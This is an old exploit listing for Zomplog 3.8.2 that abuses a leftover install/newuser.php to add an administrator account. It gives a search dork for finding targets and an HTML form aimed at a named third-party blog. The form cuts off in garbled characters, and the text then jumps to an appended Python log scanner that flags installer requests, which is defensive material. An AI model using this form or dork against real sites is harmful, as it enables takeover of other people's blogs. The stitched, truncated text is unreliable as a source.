# Title : Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit
# Published : 2008-05-16
# Author : ArxWolf
======================== WEBXAKEP.NET ===========================
Name: "Zomplog 3.8.2 <= add admin"
Version: All
Script Download: http://www.zomp.nl/zomplog/
DORK: "powered by zomplog"
Discovered By: ArxWolf
Discovered On: 16 05 2008
WWW: http://WebXakep.net
ICQ: 504-282
Vulnerability in "install/newuser.php": it allows adding a second administrator.
The "install" folder is not removed in 70% of cases.
Exploit:
--------------------------------------------------------
<br><b><center>Adding admin "Add Admin"</center></b><br><br>
<!-- <form action="http://localhost/install/newuser.php" method="POST"> /-->
<form action="http://weblog.sgrim.us/install/newuser.php" method="POST">
<p>Blog title "Blog Title"<br />
<input type="text" name="weblog_title" maxlength="40" id="blogname" />
<br />
<br />
Login "Username"<br />
<input type="text" name="login" maxlength="15" id="name" />
<br />
<br />
D?D°?
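As an added defender-side example (not part of the original listing), the following Python scans constructed Apache-style access-log lines for installer requests that did not fail, which is the signal to hunt for when an "install" folder was left in place after setup:

```python
import re

# Constructed sample access-log lines in Apache combined format (not taken from the page).
SAMPLE_LOG = """\
203.0.113.5 - - [16/May/2008:10:01:12 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [16/May/2008:10:01:30 +0000] "GET /install/ HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [16/May/2008:10:01:45 +0000] "POST /install/newuser.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [16/May/2008:10:02:00 +0000] "GET /install/newuser.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

# Minimal combined-log-format parser: client, timestamp, method, path, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Any request under the installer directory of the web root (assumed to be mounted at /).
INSTALLER_RE = re.compile(r"^/install(/|$)", re.IGNORECASE)


def parse_line(line):
    """Return the parsed fields of one log line, or None if it is not in the expected format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_installer_abuse(log_text):
    """Return (ip, method, path, status) for each installer request that was not refused.

    A 2xx/3xx response to the installer after setup means the folder was still reachable;
    a POST to newuser.php among them is the strongest sign that an account was created.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # drop any query string before matching
        if not INSTALLER_RE.match(path):
            continue
        status = int(rec["status"])
        if status < 400:  # 4xx/5xx means the server already refused the request
            hits.append((rec["ip"], rec["method"], path, status))
    return hits


if __name__ == "__main__":
    for hit in find_installer_abuse(SAMPLE_LOG):
        print("installer reachable:", hit)
```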